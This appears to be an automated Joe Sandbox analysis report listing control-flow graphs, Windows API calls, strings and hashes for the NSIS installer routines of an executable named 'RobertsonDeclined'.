                                                                                                    • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                                                    • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                    • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                                                    • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 321 4039f5-403a0d GetTempPathW call 4037cc 317->321 319 403944-40394a 318->319 320 40394c-403950 318->320 319->319 319->320 323 403952-403957 320->323 324 403958-40395c 320->324 328 403a33-403a4d DeleteFileW call 403587 321->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 321->329 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 341 4039c7 326->341 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 336 403970-403973 331->336 337 403975 331->337 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 336->332 336->337 337->332 341->316 343->326 359 4039d8-4039f0 call 407d6e call 406009 343->359 348 403997-40399a 344->348 349 40399c 344->349 357 403ae1-403af1 call 405ca0 ExitProcess 345->357 358 403bce-403bd4 345->358 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 361 403ac1-403ac7 call 4060e7 351->361 364 403a79-403a7b 352->364 366 403c51-403c59 358->366 367 403bd6-403bf3 call 4062fc * 3 358->367 359->321 361->345 369 403a62-403a74 call 403800 364->369 370 403a7d-403a87 364->370 371 403c5b 366->371 372 403c5f 366->372 396 403bf5-403bf7 367->396 397 403c3d-403c48 ExitWindowsEx 367->397 369->370 384 403a76 369->384 376 403af7-403b11 lstrcatW lstrcmpiW 370->376 377 403a89-403a99 call 40677e 370->377 371->372 376->345 382 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 376->382 377->345 390 403a9b-403ab1 call 406009 * 2 377->390 387 403b36-403b56 call 406009 * 2 382->387 388 403b2b-403b31 call 406009 382->388 384->364 407 403b5b-403b77 call 406805 DeleteFileW 387->407 388->387 390->351 396->397 401 403bf9-403bfb 396->401 397->366 400 403c4a-403c4c call 40141d 397->400 400->366 401->397 405 403bfd-403c0f GetCurrentProcess 401->405 405->397 413 403c11-403c33 405->413 411 403bb8-403bc0 407->411 412 403b79-403b89 CopyFileW 407->412 411->407 415 403bc2-403bc9 call 406c68 411->415 412->411 414 403b8b-403bab call 406c68 call 406805 call 405c3f 412->414 413->397 414->411 425 403bad-403bb4 CloseHandle 414->425 415->345 425->411
                                                                                                    APIs
                                                                                                    • #17.COMCTL32 ref: 004038A2
                                                                                                    • SetErrorMode.KERNEL32(00008001), ref: 004038AD
                                                                                                    • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNEL32(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                    • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                    • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                    • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                    • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                    • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                    • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                    • DeleteFileW.KERNEL32(004D30C0), ref: 00403A38
                                                                                                    • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                                                    • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                    • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                    • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                                    • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                    • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                    • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                    • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                    • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                    • API String ID: 2435955865-239407132
                                                                                                    • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                    • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                    • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                    • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 820 4074bb-4074c0 821 4074c2-4074ef 820->821 822 40752f-407547 820->822 823 4074f1-4074f4 821->823 824 4074f6-4074fa 821->824 825 407aeb-407aff 822->825 826 407506-407509 823->826 827 407502 824->827 828 4074fc-407500 824->828 829 407b01-407b17 825->829 830 407b19-407b2c 825->830 831 407527-40752a 826->831 832 40750b-407514 826->832 827->826 828->826 833 407b33-407b3a 829->833 830->833 838 4076f6-407713 831->838 836 407516 832->836 837 407519-407525 832->837 834 407b61-407c68 833->834 835 407b3c-407b40 833->835 851 407350 834->851 852 407cec 834->852 839 407b46-407b5e 835->839 840 407ccd-407cd4 835->840 836->837 844 407589-4075b6 837->844 842 407715-407729 838->842 843 40772b-40773e 838->843 839->834 845 407cdd-407cea 840->845 849 407741-40774b 842->849 843->849 846 4075d2-4075ec 844->846 847 4075b8-4075d0 844->847 850 407cef-407cf6 845->850 853 4075f0-4075fa 846->853 847->853 854 40774d 849->854 855 4076ee-4076f4 849->855 856 407357-40735b 851->856 857 40749b-4074b6 851->857 858 40746d-407471 851->858 859 4073ff-407403 851->859 852->850 862 407600 853->862 863 407571-407577 853->863 864 407845-4078a1 854->864 865 4076c9-4076cd 854->865 855->838 861 407692-40769c 855->861 856->845 873 407361-40736e 856->873 857->825 874 407c76-407c7d 858->874 875 407477-40748b 858->875 877 407409-407420 859->877 878 407c6d-407c74 859->878 866 4076a2-4076c4 861->866 867 407c9a-407ca1 861->867 880 407556-40756e 862->880 881 407c7f-407c86 862->881 868 40762a-407630 863->868 869 40757d-407583 863->869 864->825 871 407c91-407c98 865->871 872 4076d3-4076eb 865->872 866->864 867->845 882 40768e 868->882 884 407632-40764f 868->884 869->844 869->882 871->845 872->855 873->852 883 407374-4073ba 873->883 874->845 879 40748e-407496 875->879 885 407423-407427 877->885 878->845 879->858 889 407498 879->889 880->863 881->845 882->861 887 4073e2-4073e4 883->887 888 4073bc-4073c0 883->888 890 407651-407665 884->890 891 407667-40767a 884->891 885->859 886 407429-40742f 885->886 892 407431-407438 886->892 893 407459-40746b 886->893 896 4073f5-4073fd 887->896 897 4073e6-4073f3 887->897 894 4073c2-4073c5 GlobalFree 888->894 895 4073cb-4073d9 GlobalAlloc 888->895 889->857 898 40767d-407687 890->898 891->898 899 407443-407453 GlobalAlloc 892->899 900 40743a-40743d GlobalFree 892->900 893->879 894->895 895->852 901 4073df 895->901 896->885 897->896 897->897 898->868 902 407689 898->902 899->852 899->893 900->899 901->887 904 407c88-407c8f 902->904 905 40760f-407627 902->905 904->845 905->868
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                    • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                    • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                    • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 310444273-0
                                                                                                    • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                    • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                                    • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                    • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                    • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 2295610775-0
                                                                                                    • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                    • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                    • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                    • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405619 GetDlgItem * 2 call 403d3f KiUserCallbackDispatcher call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 83 40561e-405626 61->83 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 83->60 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                    • ShowWindow.USER32(?), ref: 004054D2
                                                                                                    • DestroyWindow.USER32 ref: 004054E6
                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00405611
                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                    • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                                    • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                    • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                                    • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                                                                                    • String ID: @rD
                                                                                                    • API String ID: 3906175533-3814967855
                                                                                                    • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                    • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                    • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                    • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 187 4030ee-4030f2 160->187 162 401601-401611 call 4062a3 161->162 163 401742-40174f 161->163 164 401962-40197d call 40145c GetFullPathNameW 161->164 165 4019ca-4019e6 call 40145c SearchPathW 161->165 166 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->166 167 401650-40166d call 40137e call 4062a3 call 40139d 161->167 168 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->168 169 401672-401686 call 40145c call 4062a3 161->169 170 401693-4016ac call 401446 call 4062a3 161->170 171 401715-401731 161->171 172 401616-40162d call 40145c call 4062a3 call 404f72 161->172 173 4016d6-4016db 161->173 174 401736-4030de 161->174 175 401897-4018a7 call 40145c call 4062d5 161->175 176 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->176 177 40163c-401645 161->177 178 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->178 162->187 194 401751-401755 ShowWindow 163->194 195 401758-40175f 163->195 216 4019a3-4019a8 164->216 217 40197f-401984 164->217 165->160 223 4019ec-4019f8 165->223 166->160 249 40179a-4017a6 call 4062a3 166->249 167->187 263 401864-40186c 168->263 264 4017de-4017fc call 405d06 CreateDirectoryW 168->264 238 401689-40168e call 404f72 169->238 243 4016b1-4016b8 Sleep 170->243 244 4016ae-4016b0 170->244 171->187 191 401632-401637 172->191 189 401702-401710 173->189 190 4016dd-4016fd call 401446 173->190 174->160 219 4030de call 405f51 174->219 239 4018c2-4018d6 call 4062a3 175->239 240 4018a9-4018bd call 4062a3 175->240 274 401912-401919 176->274 275 40191e-401921 176->275 177->191 192 401647-40164e PostQuitMessage 177->192 178->160 189->160 190->160 191->187 192->191 194->195 195->160 212 401765-401769 ShowWindow 195->212 212->160 231 4019af-4019b2 216->231 230 401986-401989 217->230 217->231 219->160 223->160 230->231 241 40198b-401993 call 4062d5 230->241 231->160 245 4019b8-4019c5 GetShortPathNameW 231->245 238->160 239->187 240->187 241->216 266 401995-4019a1 call 406009 241->266 243->160 244->243 245->160 258 4017ab-4017ac 249->258 258->160 270 401890-401892 263->270 271 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 263->271 278 401846-40184e call 4062a3 264->278 279 4017fe-401809 GetLastError 264->279 266->231 270->238 271->160 274->238 280 401923-40192b call 4062d5 275->280 281 40194a-401950 275->281 292 401853-401854 278->292 283 401827-401832 GetFileAttributesW 279->283 284 40180b-401825 GetLastError call 4062a3 279->284 280->281 298 40192d-401948 call 406c68 call 404f72 280->298 288 401957-40195d call 4062a3 281->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->258 290->292 291->263 291->264 292->291 298->288
                                                                                                    APIs
                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                    • Sleep.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                    • ShowWindow.USER32(?), ref: 00401753
                                                                                                    • ShowWindow.USER32(?), ref: 00401767
                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                    • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                    Strings
                                                                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                    • Rename: %s, xrefs: 004018F8
                                                                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                    • Rename on reboot: %s, xrefs: 00401943
                                                                                                    • Sleep(%d), xrefs: 0040169D
                                                                                                    • BringToFront, xrefs: 004016BD
                                                                                                    • detailprint: %s, xrefs: 00401679
                                                                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                    • Rename failed: %s, xrefs: 0040194B
                                                                                                    • Call: %d, xrefs: 0040165A
                                                                                                    • Jump: %d, xrefs: 00401602
                                                                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                    • Aborting: "%s", xrefs: 0040161D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                    • API String ID: 2872004960-3619442763
                                                                                                    • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                    • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                                    • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                    • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
